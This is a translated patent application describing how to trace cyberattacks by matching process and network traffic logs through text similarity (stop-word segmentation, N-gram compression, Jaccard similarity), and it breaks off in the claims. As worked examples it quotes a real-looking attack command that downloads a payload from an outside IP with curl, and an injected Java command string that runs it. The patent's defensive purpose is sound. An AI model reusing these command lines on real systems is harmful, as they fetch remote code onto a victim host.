CN115412274A - Attack tracing method and related data processing and association display method and device

Info

Publication number: CN115412274A
Application number: CN202210425983.8A
Authority: CN
Inventors: 蒋昊瑾
Original assignee: Alibaba Cloud Computing Ltd
Current assignee: Alibaba Cloud Computing Ltd
Priority date: 2022-04-21
Filing date: 2022-04-21
Publication date: 2022-11-29

Abstract

The invention discloses an attack tracing method and a related data processing and association display method and device. The method for processing attack tracing data comprises: converting at least two different types of attack tracing data generated in the same time period into at least two corresponding texts; comparing the at least two corresponding texts to determine the similarity between them; and determining, according to the similarity, whether the at least two different types of attack tracing data match. Compared with the regular expression matching used in the prior art, the method simplifies the matching process, enables automatic association of massive data, improves the matching efficiency of attack tracing data, and supports faster attack tracing.

Description

Attack source tracing method, related data processing, associated display method and device

Technical Field

The present invention relates to the technical field of network security, and in particular to an attack source tracing method and related data processing and association display methods and devices.

Background

Attack source tracing is one of the important methods of post-incident response in network security. Data related to attack source tracing, such as users' threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, and threat intelligence, is correlated and analyzed to form an attack traceability map that restores the attacker's attack path and attack techniques, thereby providing a highly interpretable basis for vulnerability repair, authenticity verification, root cause analysis, and impact assessment. Associating massive numbers of alarms with each type of security log quickly and accurately over a long time span is an important challenge for network attack source tracing.

In constructing the attack traceability map, correlation mining can be carried out among multiple kinds of logs and/or intelligence information. For example, correlation mining between network traffic logs and process logs is the key to tracing between factual data inside the host and network-layer data. At present, network attack source tracing is generally implemented with security rules: for the process log and the network traffic log within the same time window, regular expressions are used to match, in plain text, the cmd_line field or uri field of the process log against the post_data field of the traffic log. This approach has several drawbacks. The matching rules must be defined one by one in advance by security engineers, so matching cannot be automated, the rule set keeps growing, and rule matching becomes laborious at large data volumes. Evaluating complex regular expressions over massive data is very time-consuming. The rules only match specific fields of specific logs and cannot be extended to other scenarios. Rule filtering also leaves many weakly correlated edges, which makes the matching results inaccurate.

Summary of the Invention

In view of the above problems, the present invention is proposed to provide a method for processing attack traceability data, an attack source tracing method, and a method and device for associated display of attack information that overcome, or at least partially solve, the above problems.

In a first aspect, an embodiment of the present invention provides a method for processing attack traceability data, including:

converting at least two pieces of attack traceability data of different types, generated within the same time period, into at least two corresponding texts;

comparing the at least two corresponding texts to determine the similarity between them; and

determining, according to the similarity, whether the at least two pieces of attack traceability data of different types match.

In one embodiment, before the at least two pieces of attack traceability data of different types generated within the same time period are converted into at least two corresponding texts, the method further includes:

selecting, according to the length of a preset time window, the attack traceability data located within the same time window from the at least two pieces of attack traceability data of different types.

In one embodiment, comparing the at least two corresponding texts to determine the similarity between them includes:

segmenting each of the at least two corresponding texts according to a preset stop word rule to generate word vectors, each containing multiple words; and

calculating the similarity between the word vectors and using it as the similarity between the at least two texts.

In one embodiment, calculating the similarity between the word vectors specifically includes:

compressing each word vector to obtain compressed word vectors; and

calculating the Jaccard similarity between the compressed word vectors.

In one embodiment, compressing a word vector includes: re-segmenting the words in the word vector using a preset N-Gram segmentation method to obtain the compressed word vector.

In one embodiment, calculating the similarity between the word vectors includes:

calculating the length of the discontinuous matching character string between the word vectors, and using that length as the similarity between the word vectors.

In a second aspect, an embodiment of the present invention provides an attack source tracing method, including:

collecting at least two pieces of attack traceability data of different types generated within the same time period;

judging whether the at least two pieces of attack traceability data of different types match; and

if they match, determining that the at least two pieces of attack traceability data of different types are associated;

wherein the step of judging whether the at least two pieces of attack traceability data of different types match is implemented by the aforementioned method for processing attack traceability data.

In a third aspect, an embodiment of the present invention provides a method for associated display of attack information, including:

determining whether at least two pieces of attack traceability data of different types generated within the same time period are associated; and

if so, displaying the association between the different types of attack traceability data on the attack traceability map in a preset association manner;

wherein determining whether the at least two pieces of attack traceability data of different types generated within the same time period are associated is implemented by the aforementioned attack source tracing method.

In a fourth aspect, an embodiment of the present invention provides a device for processing attack traceability data, including:

a conversion module, configured to convert at least two pieces of attack traceability data of different types generated within the same time period into at least two corresponding texts;

a comparison module, configured to compare the at least two corresponding texts and determine the similarity between them; and

a matching module, configured to determine, according to the similarity, whether the at least two pieces of attack traceability data of different types match.

In a fifth aspect, an embodiment of the present invention provides an attack source tracing device, including:

a collection module, configured to collect at least two pieces of attack traceability data of different types generated within the same time period;

a judging module, configured to judge whether the at least two pieces of attack traceability data of different types match; and

an association module, configured to determine, when the judging module judges that they match, that the at least two pieces of attack traceability data of different types are associated;

wherein judging whether the at least two pieces of attack traceability data of different types match is implemented by the aforementioned method for processing attack traceability data.

In a sixth aspect, an embodiment of the present invention provides a device for associated display of attack information, including:

a determination module, configured to determine whether at least two pieces of attack traceability data of different types generated within the same time period are associated; and

an association display module, configured to display, when the determination module determines that an association exists, the association between the different types of attack traceability data on the attack traceability map in a preset association manner;

wherein determining whether the at least two pieces of attack traceability data of different types generated within the same time period are associated is implemented by the aforementioned attack source tracing method.

In a seventh aspect, an embodiment of the present invention provides a server, including a memory, a processor, and a computer program stored in the memory and executable on the processor, wherein the processor, when executing the program, implements the aforementioned method for processing attack traceability data, the aforementioned attack source tracing method, or the aforementioned method for associated display of attack information.

In an eighth aspect, an embodiment of the present invention provides a computer-readable storage medium storing a computer program, wherein the computer program, when executed by a processor, implements the aforementioned method for processing attack traceability data, the aforementioned attack source tracing method, or the aforementioned method for associated display of attack information.

In a ninth aspect, an embodiment of the present invention provides a computer program product including a computer program, wherein the computer program, when executed by a processor, implements the aforementioned method for processing attack traceability data, the aforementioned attack source tracing method, or the aforementioned method for associated display of attack information.

The beneficial effects of the technical solutions provided by the embodiments of the present invention include at least the following:

The embodiments of the present invention mine the correlation between attack traceability data on the basis of text similarity. At least two pieces of attack traceability data of different types generated within the same time period are converted into corresponding texts, the similarity between the texts is compared, and that similarity is used to determine whether the data match. Measuring the correlation of logs within the same time range is thereby reduced to comparing the similarity of two texts, or counting how many words they share. Compared with the regular expression matching used in the prior art, this simplifies the matching process, enables automatic association of massive data, improves the matching efficiency of attack traceability data, and supports faster attack source tracing.

The embodiments of the present invention also segment the text converted from the attack traceability data into word vectors, compress the word vectors, and calculate the Jaccard similarity of the compressed word vectors to judge whether the attack traceability data match. This balances computation amount, computation time, computational complexity, and memory usage. Accurate matching results are obtained while the timeliness of attack source tracing is preserved, which supports timely follow-up operations such as security warning, vulnerability repair, attack cause analysis, and impact assessment.

The method for associated display of attack information provided by the embodiments of the present invention displays matched attack traceability data of different types visually in the attack traceability map, which helps users identify attack paths, attack techniques, and other information from the map more intuitively and quickly.

Additional features and advantages of the invention will be set forth in the description which follows, and in part will be apparent from the description, or may be learned by practice of the invention. The objectives and other advantages of the invention may be realized and attained by the structure particularly pointed out in the written description, the claims, and the accompanying drawings.

The technical solutions of the present invention are described in further detail below with reference to the accompanying drawings and embodiments.

Description of the Drawings

The accompanying drawings provide a further understanding of the present invention and constitute a part of the description. Together with the embodiments of the present invention they serve to explain the present invention, and they do not limit it. In the drawings:

FIG. 1 is a flowchart of a method for processing attack traceability data according to an embodiment of the present invention;

FIG. 2 is a flowchart of an example, provided by an embodiment of the present invention, in which the cmd_line field of a process log is matched against the post_data field of a traffic log;

FIG. 3 is a flowchart of an attack source tracing method provided by an embodiment of the present invention;

FIG. 4 is a flowchart of a method for associated display of attack information provided by an embodiment of the present invention;

FIG. 5 is a schematic diagram of an example of an attack traceability map display interface provided by an embodiment of the present invention;

FIG. 6 is a structural block diagram of a device for processing attack traceability data provided by an embodiment of the present invention;

FIG. 7 is a structural block diagram of an attack source tracing device provided by an embodiment of the present invention;

FIG. 8 is a structural block diagram of a device for associated display of attack information provided by an embodiment of the present invention.

Detailed Description

Exemplary embodiments of the present disclosure will be described in more detail below with reference to the accompanying drawings. Although exemplary embodiments of the present disclosure are shown in the drawings, it should be understood that the present disclosure may be embodied in various forms and should not be limited by the embodiments set forth herein. Rather, these embodiments are provided for a more thorough understanding of the present disclosure and to fully convey the scope of the present disclosure to those skilled in the art.

To solve the problems of existing attack source tracing, in which fields in process logs are matched in plain text using regular expressions, embodiments of the present invention provide a method for processing attack traceability data, an attack source tracing method, and a method for associated display of attack information.

The method for processing attack traceability data provided by the embodiment of the present invention is first described in detail below.

The method for processing attack traceability data provided by the embodiment of the present invention, as shown in FIG. 1, includes:

S11. Converting at least two pieces of attack traceability data of different types, generated within the same time period, into at least two corresponding texts;

S12. Comparing the at least two corresponding texts to determine the similarity between them;

S13. Determining, according to the similarity, whether the at least two pieces of attack traceability data of different types match.

In the embodiment of the present invention, the different types of attack traceability data include, but are not limited to, one or more of: users' threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, threat intelligence, and the like.

To trace an attack, the correlation between attack traceability data generated within the same time period usually needs to be analyzed. To match such data, the embodiment of the present invention uses a time window: according to the length of a preset time window, the attack traceability data located within the same time window is selected from at least two pieces of attack traceability data of different types for the subsequent matching process.

Attack traceability data is generated continuously. To keep attack source tracing timely, the processing method provided by the embodiment of the present invention can run continuously. For each analysis, a sliding time window is used to select, from each of the different types of attack traceability data being input (generated in real time), the range of data to be compared.

After the range of data to be compared is selected, whether two or more kinds of attack traceability data match, and therefore whether they are associated, is determined from the analysis result. If they are associated, the user is notified immediately in any of various ways (for example, by displaying the association on the traceability map), which keeps the attack source tracing analysis timely.

The length of the sliding time window determines, to some extent, the amount of attack traceability data to be matched. If the data is too short, the analysis result may be inaccurate; if it is too long, the analysis and calculation take longer. The window length can therefore be chosen according to the available computing power and the timeliness requirement, so that matching is accurate while the timeliness requirement of attack source tracing is met.
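The window selection described above can be sketched as follows. This is a minimal illustration, not the patented implementation: the `Record` type, its `ts_ms` and `text` fields, the `sliding_windows` function, and the `step_ms` parameter are all hypothetical names introduced here, and the sketch assumes both logs are already loaded in memory rather than streamed.

```python
from dataclasses import dataclass
from typing import Iterator, List, Tuple


@dataclass
class Record:
    ts_ms: int  # event timestamp in milliseconds (hypothetical field)
    text: str   # field to compare, e.g. cmd_line or post_data


def sliding_windows(
    process_log: List[Record],
    traffic_log: List[Record],
    window_ms: int,
    step_ms: int,
) -> Iterator[Tuple[int, List[Record], List[Record]]]:
    """Yield (window_start, process_records, traffic_records) for every
    window that contains at least one record from each log."""
    if window_ms <= 0 or step_ms <= 0:
        raise ValueError("window_ms and step_ms must be positive")
    all_ts = [r.ts_ms for r in process_log] + [r.ts_ms for r in traffic_log]
    if not all_ts:
        return
    start, last = min(all_ts), max(all_ts)
    while start <= last:
        stop = start + window_ms
        # Half-open interval [start, stop) so a record falls in one step only
        # when step_ms == window_ms.
        p = [r for r in process_log if start <= r.ts_ms < stop]
        t = [r for r in traffic_log if start <= r.ts_ms < stop]
        if p and t:
            yield start, p, t
        start += step_ms
```

A smaller `step_ms` than `window_ms` gives overlapping windows, which trades extra computation for a lower chance of splitting related records across a window boundary.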

In one embodiment, in step S11, data cleaning, and where necessary operations such as data decoding, can be performed on two or more different kinds of log data to convert each of them into a corresponding text.

In one embodiment, in step S12, to facilitate text matching, word vectors can be generated from the texts, and the similarity between two texts is obtained by calculating the similarity between their word vectors. The similarity of texts is thus converted into the similarity between word vectors.

The word vectors can be obtained as follows: each of the at least two corresponding texts is segmented according to a preset stop word rule to generate a word vector containing multiple words.

The stop word rule may split words at preset separators (such as quotation marks) or spaces, for example by extracting the characters enclosed in quotation marks as one word. For the specific segmentation method, reference may be made to the prior art, which is not described in detail here.

For example, segmenting the cmd_line field "curl -O http://213.202.230.103/syn" of a process log by stop words gives the word vector s1 = [curl, O, http://213.202.230.103/syn].

Following this stop word segmentation principle, the words contained in the converted text are extracted to form a word vector.

The character strings contained in the converted text may be very long, and computing directly on the word vectors may require too much computation and take too long. In the embodiment of the present invention, the word vectors can therefore be compressed.

In one embodiment, the present invention can re-segment the words in the word vector using a preset N-Gram segmentation method to obtain the compressed word vector.

N-Gram refers to a class of language models that share the same text segmentation method, in which multiple fragments (Grams) are generated by multi-order enumeration. The segmentation works as follows: a window of length N slides over the text from left to right, one character at a time; at each step the window frames a character string, which is one Gram; all the Grams in the text together form the segmentation result.

When enumerating, the order of enumeration can be determined in advance (N is the order of enumeration), and the enumeration is then carried out at the preset order to obtain the corresponding segmentation result.

Taking the cmd_line field "curl -O http://213.202.230.103/syn" as an example, the word vectors obtained by segmentation are shown in the following table:

Table 1

As the above example shows, if N is too small, there are too many fragments and each fragment is too short, so the computation is heavy and slow and the matching accuracy is low. If N is too large, memory consumption grows and the features become sparse, which also lowers the matching accuracy. An appropriate value of N can therefore be chosen according to the actual situation to balance computation amount, computation time, memory consumption, and accuracy.
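The sliding-window segmentation can be illustrated with a short sketch. The function names `char_ngrams` and `compress` are hypothetical. Applying the window to each word separately, and keeping words shorter than N unchanged, are assumptions made here for illustration; the text does not specify how short words are handled.

```python
from typing import List


def char_ngrams(text: str, n: int) -> List[str]:
    """Slide a window of length n over text one character at a time."""
    if n <= 0:
        raise ValueError("n must be positive")
    # range() is empty when len(text) < n, so short inputs yield no grams.
    return [text[i:i + n] for i in range(len(text) - n + 1)]


def compress(tokens: List[str], n: int) -> List[str]:
    """Re-segment every word of a word vector into character n-grams.

    Assumption: a word shorter than n is kept whole so that short tokens
    such as a one-letter flag are not silently dropped.
    """
    out: List[str] = []
    for tok in tokens:
        grams = char_ngrams(tok, n)
        out.extend(grams if grams else [tok])
    return out


print(char_ngrams("curl", 2))      # ['cu', 'ur', 'rl']
print(compress(["curl", "O"], 3))  # ['cur', 'url', 'O']
```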

In one embodiment, the Jaccard similarity between the compressed word vectors obtained above can be calculated and used as the final result.

Of course, the embodiment of the present invention is not limited to using the Jaccard similarity to calculate the similarity between word vectors; any other method that can calculate similarity may be used.

The Jaccard similarity coefficient is mainly used to calculate the similarity between samples measured by symbols or Boolean values. When the feature attributes of samples are identified by symbols or Boolean values, the magnitude of a difference cannot be measured and only a result of "same or not" can be obtained; the Jaccard similarity is therefore concerned with the features that the samples have in common.

In the embodiment of the present invention, the Jaccard similarity is used to evaluate word vector similarity for the following reasons: (1) the Jaccard similarity is simple to calculate and has low time complexity; (2) its result is affected by field length and tends to be more accurate for relatively long fields. This matches a property of the embodiment of the present invention: for the same number of shared words, the longer the attack traceability data, the more reliable the similarity value (that is, the more accurate the matching result).

The general expression of the Jaccard similarity is as follows:

Given two sets A and B, their Jaccard similarity is:

$$J(A, B) = \frac{\mathrm{len}(A \text{ and } B)}{\mathrm{len}(A \text{ or } B)}$$

In the above formula, len(A and B) is the length of the intersection of A and B, and len(A or B) is the length of the union of A and B.

The Jaccard similarity is thus the proportion of co-occurring words between the sets.
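As a small illustration of this definition, the following sketch computes the Jaccard similarity of two word vectors by treating each as a set. The function name `jaccard` and the convention of returning 0.0 for two empty inputs are assumptions made here, and the sample vectors are simplified from the s1 example.

```python
from typing import Iterable


def jaccard(a: Iterable[str], b: Iterable[str]) -> float:
    """Return len(A and B) / len(A or B) for the sets built from a and b."""
    set_a, set_b = set(a), set(b)
    union = set_a | set_b
    if not union:
        # Assumption: two empty vectors are treated as having no similarity.
        return 0.0
    return len(set_a & set_b) / len(union)


s1 = ["curl", "O", "syn"]
s2 = ["0022", "curl", "O", "syn"]
print(jaccard(s1, s2))  # 0.75 (3 shared words out of 4 distinct words)
```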

Combined with the word vector compression step described above, after the word vectors are compressed the embodiment of the present invention can use the following formula to calculate the similarity between different compressed word vectors:

$$J(S1', S2') = \frac{\mathrm{len}(S1' \text{ and } S2')}{\mathrm{len}(S1') + \mathrm{len}(S2') - \mathrm{len}(S1' \text{ and } S2')}$$

Here S1′ and S2′ are the two compressed word vectors whose similarity is to be calculated, and len(S1′) and len(S2′) are the lengths of the compressed word vectors S1′ and S2′ respectively.

If there are more than two word vectors (or compressed word vectors) whose similarity needs to be calculated, they can be matched pairwise: the Jaccard similarity is calculated for each pair of word vectors (or compressed word vectors) to determine whether the pair matches.

After the Jaccard similarity value is calculated, it can be compared with a preset similarity threshold. If it is greater than the preset similarity threshold, it is determined that the attack traceability data corresponding to the word vectors match.
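The pairwise comparison against a threshold might look like the sketch below. The function name `match_pairs`, the dictionary keys, and the threshold value 0.5 are illustrative assumptions; the text does not state a threshold value.

```python
from itertools import combinations
from typing import Dict, List, Tuple


def jaccard(a: List[str], b: List[str]) -> float:
    """Jaccard similarity of two word vectors, treated as sets."""
    set_a, set_b = set(a), set(b)
    union = set_a | set_b
    return len(set_a & set_b) / len(union) if union else 0.0


def match_pairs(
    vectors: Dict[str, List[str]], threshold: float
) -> List[Tuple[str, str, float]]:
    """Return every pair whose similarity is strictly greater than threshold."""
    matches = []
    for (name_a, vec_a), (name_b, vec_b) in combinations(vectors.items(), 2):
        score = jaccard(vec_a, vec_b)
        if score > threshold:
            matches.append((name_a, name_b, score))
    return matches


vectors = {
    "process_log": ["curl", "O", "syn"],
    "traffic_log": ["0022", "curl", "O", "syn"],
    "file_log": ["ls"],
}
print(match_pairs(vectors, threshold=0.5))
# [('process_log', 'traffic_log', 0.75)]
```

Pairwise comparison grows quadratically with the number of vectors, which is one reason the window length and the compression step matter for running time.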

If the Jaccard similarity is not used, a simplified algorithm that compares co-occurring words using dynamic programming can be used instead.

In this simplified algorithm, each word obtained by stop word segmentation is treated as a single character. Let s1″ = x = '[curl O http://213.202.230.103/syn]', and let xi be the i-th item of x, for example x0 = 'curl'.

Similarly, let s2″ = y = '...0022 curl O http://213.202.230.103/syn,...', and let yj be the j-th item of y.

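A matrix C with i rows and j columns is constructed to calculate the length of the discontinuous matching character substring of string x and string y, where C[i][j] is that length for the first i items of x and the first j items of y. The dynamic programming recurrence, in its standard form for this problem, is:

$$C[i][j] = \begin{cases} 0, & i = 0 \text{ or } j = 0 \\ C[i-1][j-1] + 1, & i, j > 0 \text{ and } x_{i-1} = y_{j-1} \\ \max\left(C[i-1][j],\ C[i][j-1]\right), & \text{otherwise} \end{cases}$$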

C[i][j]的值长度越长，则代表匹配到的相似性文本越长，则词向量之间的相似度越大。The longer the value length of C[i][j], the longer the matched similarity text, and the greater the similarity between word vectors.

简化计算可以直接看矩阵中i和j取最大值的那个元素的值，是否大于预设的阈值，如果是，则确定词向量之间匹配。To simplify the calculation, you can directly check whether the value of the element with the maximum value of i and j in the matrix is greater than the preset threshold, and if so, determine the match between the word vectors.
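The recurrence itself is not spelled out in this passage. The following Python sketch assumes it is the standard longest-common-subsequence recurrence, which is one common way to compute the length of a non-contiguous match. The names `lcs_length` and `is_match` and the threshold value are hypothetical.

```python
def lcs_length(x, y):
    """Length of the longest common (not necessarily contiguous) subsequence.

    x and y are lists of words; each word is compared as one "character".
    """
    rows, cols = len(x), len(y)
    # c[i][j] holds the result for the first i items of x and first j of y.
    c = [[0] * (cols + 1) for _ in range(rows + 1)]
    for i in range(1, rows + 1):
        for j in range(1, cols + 1):
            if x[i - 1] == y[j - 1]:
                c[i][j] = c[i - 1][j - 1] + 1
            else:
                c[i][j] = max(c[i - 1][j], c[i][j - 1])
    # The element with the largest i and j is the overall match length.
    return c[rows][cols]


def is_match(x, y, threshold):
    """Compare the final matrix element with a preset threshold."""
    return lcs_length(x, y) > threshold


x = ["curl", "O", "http://213.202.230.103/syn"]
y = ["0022", "curl", "O", "http://213.202.230.103/syn", "tail"]  # "tail" is a made-up token
print(lcs_length(x, y), is_match(x, y, threshold=2))
```

Because only the final element is compared with the threshold, the full matrix could be replaced by two rolling rows when memory matters.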

The following example, which compares the cmd_line field of a process log with the post_data field of a traffic log, illustrates the method for processing attack tracing data provided by the embodiments of the present invention.

Referring to Figure 2, the processing in this example includes the following steps:

Step S21: Determine the length of the sliding window, that is, the time range. Process log data and network traffic data are input, and the time window length is used to select, from the cmd_line field of the input process log and the post_data field of the traffic log, the range of data to be compared. The time window length is limited to 180 ms.
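As an illustrative sketch only, step S21 could be realized by pairing each process log record with the traffic log records whose timestamps lie within the window. The record layout (timestamp in milliseconds, text) and the symmetric interpretation of the window (a difference of at most 180 ms in either direction) are assumptions, not details given in the text.

```python
from bisect import bisect_left, bisect_right

WINDOW_MS = 180  # window length stated in the text


def candidate_pairs(process_log, traffic_log, window_ms=WINDOW_MS):
    """Yield (cmd_line, post_data) pairs whose timestamps differ by at most window_ms.

    Each log is a list of (timestamp_ms, text) tuples (hypothetical layout).
    """
    traffic = sorted(traffic_log)
    times = [t for t, _ in traffic]
    for ts, cmd_line in process_log:
        lo = bisect_left(times, ts - window_ms)
        hi = bisect_right(times, ts + window_ms)
        for _, post_data in traffic[lo:hi]:
            yield cmd_line, post_data


process_log = [(1000, "cmd-a")]
traffic_log = [(900, "post-1"), (1100, "post-2"), (1500, "post-3")]
print(list(candidate_pairs(process_log, traffic_log)))
```

Sorting the traffic log once and locating each window by binary search avoids comparing every process record with every traffic record.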

Step S22: Perform data cleaning and word vector construction on the selected data. The post_data data is URL-decoded, and the cmd_line field and post_data field to be compared are segmented according to appropriate stop-word rules. For example, the following regular expression is used for stop-word segmentation:

[x for x in re.sub(r'[^A-Za-z0-9_.]', ' ', str1).split(' ') if x != '']

Through stop-word segmentation, a text can be divided in order into a series of "words". For example, after the cmd_line field "curl -O http://213.202.230.103/syn" is segmented according to the stop-word segmentation rules, the word vector s1 = [curl, O, http://213.202.230.103/syn] is obtained; after the post_data field "...+var+cmd+=+new+java.lang.String(\u0022cd+/tmp;curl+O+http://213.202.230.103/syn..." is segmented according to the stop-word segmentation rules, the word vector s2 = [..., 0022, curl, O, http://213.202.230.103/syn, ...] is obtained.
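A minimal Python sketch of the cleaning and segmentation in step S22 follows. It assumes that the replacement string and the split separator in the regular expression above are both a single space, and it uses `urllib.parse.unquote_plus` for URL decoding; the helper names `url_decode` and `tokenize` are hypothetical. Note that with this character class the URL is also broken at ':' and '/', so the tokens are finer than the illustrative vector s1 in the text; keeping the URL as one token would require a different character class, which the text does not specify.

```python
import re
from urllib.parse import unquote_plus

# Every character outside this class is treated as a separator.
SEPARATOR = re.compile(r"[^A-Za-z0-9_.]")


def url_decode(raw):
    """URL-decode a post_data value ('+' becomes a space, %XX is unescaped)."""
    return unquote_plus(raw)


def tokenize(text):
    """Split text into an ordered list of words, dropping empty pieces."""
    return [tok for tok in SEPARATOR.sub(" ", text).split(" ") if tok != ""]


cmd_line = "curl -O http://213.202.230.103/syn"
print(tokenize(cmd_line))
print(tokenize(url_decode("curl+-O+http%3A%2F%2F213.202.230.103%2Fsyn")))
```

Applying the same tokenizer to both fields after decoding is what makes the two word vectors directly comparable.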

Step S23: Compress the word vectors.

s1 and s2 are compressed using 2-grams to obtain the compressed word vectors s1′ and s2′ respectively.

After compression, the word vector of the cmd_line field becomes s1′ = [curlO, Ohttp://213.202.230.103/syn];

the word vector of the post_data field becomes s2′ = [...0022, 0022curl, curlO, Ohttp://213.202.230.103/syn, http://213.202.230.103/syn...].
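The compression in step S23 can be sketched as a word-level 2-gram that joins each pair of adjacent words into one token, which reproduces s1′ from s1 in the example above. The function name `two_gram` is an assumption made for illustration.

```python
def two_gram(words):
    """Join each pair of adjacent words into one token (word-level 2-gram)."""
    return [a + b for a, b in zip(words, words[1:])]


s1 = ["curl", "O", "http://213.202.230.103/syn"]
print(two_gram(s1))
```

A vector of n words yields n - 1 tokens, so a vector with fewer than two words compresses to an empty list and would need separate handling before any similarity is computed.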

Step S24: Calculate the similarity of the compressed word vectors.

The Jaccard similarity is calculated according to the Jaccard similarity formula. The calculation process is not detailed here.

Step S25: Compare the similarity of the compressed word vectors with a preset similarity threshold.

Step S26: If the similarity compared in step S25 is greater than the threshold, it is determined that the data ranges to be compared in the cmd_line field of the process log and the post_data field of the traffic log match, that is, the two are associated within the selected time period.

Based on the same inventive concept, an embodiment of the present invention further provides an attack tracing method which, referring to Figure 3, includes the following steps:

S31. Collect at least two pieces of attack tracing data of different types generated within the same time period;

S32. Determine whether the at least two pieces of attack tracing data of different types match; if they match, perform the following step S33;

S33. Determine that an association exists between the two pieces of attack tracing data of different types.

The above step of determining whether the at least two pieces of attack tracing data of different types match is realized by the method for processing attack tracing data described above.

With the attack tracing method provided by the embodiment of the present invention, the matching relationship between pieces of attack tracing data is used to determine that they are associated, which supports subsequent vulnerability repair, authenticity verification, attack root cause analysis, and impact assessment.

To display the association of the above attack tracing information more intuitively, an embodiment of the present invention further provides a method for association display of attack information which, referring to Figure 4, includes:

S41. Determine whether at least two pieces of attack tracing data of different types generated within the same time period are associated; if so, perform S42;

S42. Display, on the attack tracing graph, the association between the pieces of attack tracing data of different types in a preset association manner.

The above determination of whether at least two pieces of attack tracing data of different types generated within the same time period are associated is realized by the attack tracing method described in the foregoing embodiment (as shown in Figure 3); the specific implementation process is not repeated here.

An example of an attack tracing graph display interface is shown in Figure 5.

Referring to Figure 5, when the above method determines that cmd.exe (the node representing the process log) and HTTP (the node representing the network traffic log) are associated within a certain time period, the two nodes are connected by a line with an arrow. The user can click a node to view its details, such as the log time, the node type and name (HTTP), the source IP, source port, destination IP, destination port, and attack method.
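Purely as an illustration of the data behind such a display, the nodes and arrows could be held in a small directed-graph structure like the Python sketch below. The class names `Node` and `TraceGraph`, the field names, the detail values, and the direction of the arrow are all hypothetical; the text does not specify how the graph is stored or which way the arrow points.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    name: str   # e.g. "cmd.exe" or "HTTP"
    kind: str   # type of log the node represents
    details: dict = field(default_factory=dict)  # shown when the node is clicked


@dataclass
class TraceGraph:
    nodes: dict = field(default_factory=dict)  # name -> Node
    edges: list = field(default_factory=list)  # (source name, target name)

    def add_node(self, node):
        self.nodes[node.name] = node

    def link(self, source, target):
        """Add a directed edge once two nodes are found to be associated."""
        if source in self.nodes and target in self.nodes:
            self.edges.append((source, target))


graph = TraceGraph()
graph.add_node(Node("HTTP", "network traffic log", {"dst_port": 80}))  # made-up detail
graph.add_node(Node("cmd.exe", "process log"))
graph.link("HTTP", "cmd.exe")  # arrow direction chosen arbitrarily here
print(graph.edges)
```

Keeping the per-node details in a dictionary leaves room for the fields listed above (log time, IP addresses, ports, attack method) without fixing a schema.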

Based on the same inventive concept, embodiments of the present invention further provide a device for processing attack tracing data, an attack tracing device, and a device for association display of attack information. Because the principles by which these devices solve the problem are similar to those of the foregoing method for processing attack tracing data, attack tracing method, and method for association display of attack information, the implementation of the devices can refer to the implementation of the foregoing methods, and repeated details are not described again.

An embodiment of the present invention provides a device for processing attack tracing data which, referring to Figure 6, includes:

a conversion module 61, configured to convert at least two pieces of attack tracing data of different types generated within the same time period into at least two corresponding texts respectively;

a comparison module 62, configured to compare the at least two corresponding texts to determine the similarity between the at least two corresponding texts;

a matching module 63, configured to determine, according to the similarity, whether the at least two pieces of attack tracing data of different types match.

An embodiment of the present invention provides an attack tracing device which, referring to Figure 7, includes:

a collection module 71, configured to collect at least two pieces of attack tracing data of different types generated within the same time period;

a judging module 72, configured to judge whether the at least two pieces of attack tracing data of different types match;

an association module 73, configured to determine, when the judging module judges that they match, that an association exists between the two pieces of attack tracing data of different types.

The above judgment of whether the at least two pieces of attack tracing data of different types match is realized by the method for processing attack tracing data described above.

An embodiment of the present invention provides a device for association display of attack information which, referring to Figure 8, includes:

a determining module 81, configured to determine whether at least two pieces of attack tracing data of different types generated within the same time period are associated;

an association display module 82, configured to display, when the determining module determines that an association exists, the association between the pieces of attack tracing data of different types on the attack tracing graph in a preset association manner.

The determination of whether at least two pieces of attack tracing data of different types generated within the same time period are associated is realized by the attack tracing method described in the foregoing embodiment (as shown in Figure 3).

An embodiment of the present invention provides a server, including: a memory, a processor, and a computer program stored in the memory and executable on the processor. When the processor executes the program, it implements the foregoing method for processing attack tracing data, the foregoing attack tracing method, or the foregoing method for association display of attack information.

An embodiment of the present invention provides a computer-readable storage medium storing a computer program. When the computer program is executed by a processor, it implements the foregoing method for processing attack tracing data, the foregoing attack tracing method, or the foregoing method for association display of attack information.

An embodiment of the present invention provides a computer program product including a computer program. When the computer program is executed by a processor, it implements the foregoing method for processing attack tracing data, the foregoing attack tracing method, or the foregoing method for association display of attack information.

As for the device for processing attack tracing data, the attack tracing device, and the device for association display of attack information in the above embodiments, the specific manner in which each module performs its operations has been described in detail in the embodiments of the corresponding methods and is not elaborated here.

Those skilled in the art should understand that the embodiments of the present invention may be provided as a method, a system, or a computer program product. Accordingly, the present invention may take the form of an entirely hardware embodiment, an entirely software embodiment, or an embodiment combining software and hardware aspects. Furthermore, the present invention may take the form of a computer program product implemented on one or more computer-usable storage media (including but not limited to disk storage, optical storage, and the like) containing computer-usable program code.

The present invention is described with reference to flowcharts and/or block diagrams of methods, devices (systems), and computer program products according to embodiments of the present invention. It should be understood that each flow and/or block in the flowcharts and/or block diagrams, and combinations of flows and/or blocks in the flowcharts and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general-purpose computer, a special-purpose computer, an embedded processor, or other programmable data processing device to produce a machine, such that the instructions executed by the processor of the computer or other programmable data processing device produce means for implementing the functions specified in one or more flows of the flowchart and/or one or more blocks of the block diagram.

These computer program instructions may also be stored in a computer-readable memory capable of directing a computer or other programmable data processing device to operate in a specific manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means, which implement the functions specified in one or more flows of the flowchart and/or one or more blocks of the block diagram.

These computer program instructions may also be loaded onto a computer or other programmable data processing device, causing a series of operational steps to be performed on the computer or other programmable device to produce computer-implemented processing, such that the instructions executed on the computer or other programmable device provide steps for implementing the functions specified in one or more flows of the flowchart and/or one or more blocks of the block diagram.

Obviously, those skilled in the art can make various changes and modifications to the present invention without departing from its spirit and scope. Thus, if these changes and modifications fall within the scope of the claims of the present invention and their technical equivalents, the present invention is also intended to include them.

Claims

1. A method for processing attack tracing data, comprising:

converting at least two pieces of attack tracing data of different types generated within the same time period into at least two corresponding texts respectively;

comparing the at least two corresponding texts to determine the similarity between the at least two corresponding texts;

determining, according to the similarity, whether the at least two pieces of attack tracing data of different types match.

2. The method according to claim 1, wherein, before converting the at least two pieces of attack tracing data of different types generated within the same time period into at least two corresponding texts, the method further comprises:

